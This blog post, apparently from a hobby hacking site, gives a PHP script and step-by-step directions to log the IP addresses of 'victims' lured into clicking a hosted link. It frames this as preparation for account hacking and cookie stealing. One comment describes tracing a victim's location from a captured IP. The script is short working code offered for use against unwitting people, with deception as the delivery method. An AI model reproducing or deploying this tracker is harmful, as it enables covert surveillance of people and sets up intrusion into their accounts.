Learn How to Know or Steal your Victims IP Address
|
If you want to hack or crack someone accounts, Knowing your victims IP address will be an important issue to do it. As it is also need in cookie stealing techniques. Therefore, below is a simple php exploit to known your victims IP address by sending to it and saying for clicking or downloading etc..
Procedure-
1. First of all make an blank txt file in your computer and rename it as get.php
2. Then open it and paste the below code properly-
<?php
$file = 'IP.txt';
$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location:
http://google.com'); }
fwrite($handle, $_GET['p'].': '.$_SERVER
['REMOTE_ADDR'].'\r\n');
fclose($handle)
?>
3. now save the php file.
4. Then make another blank file with .txt extension and rename it with IP.txt for storing IP addresses.
5. Hence, you have now 2 files and start uploading them into free hosting companies like 110mb.com, my3gb.com, 50webs.com etc..
6. Recommended to upload these 2 files into my3gb.com and then copy the link of get.php file.
7. Done! now start sharing this link with your friends and ask them to click or download.
8. When anyone clicks, the IP address of him will get stored into your IP.txt file in my3gb.com account.
9. Therefore, note his/her IP address and do some hacking whatever you want.
…………………………………………………………………………………………………………………………………………………………..
Enjoy na! If you want to become an pure Ethical hacker and Computer Security Expert like me, please click here to download my new eBook on “Power of Hacking”.
For subscribing Email updates or rss, click here.
Join me on Google+
|
Respected Readers :-
|
E njoyed this post very much – So why not you Subscribe to our regular Email Updates ! and stay connected with us forever .
how to hack with IP address?
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteNice one
ReplyDeleteNice blog useful for those who are looking for some script to find the ip address of someone online ...However there are many software's ,tools found online to find the ip address of any victim ...I used one among them and easily figured out the ip address of one of the victim ...After finding the ip address i easily traced his location through sites like Ip-Details.com here they are rendering ip search tool which will display details like ip location ,ISP address ,name and so on but i cant trace exact home address of that person from ip address i can trace only ISP details from ip address ...
ReplyDelete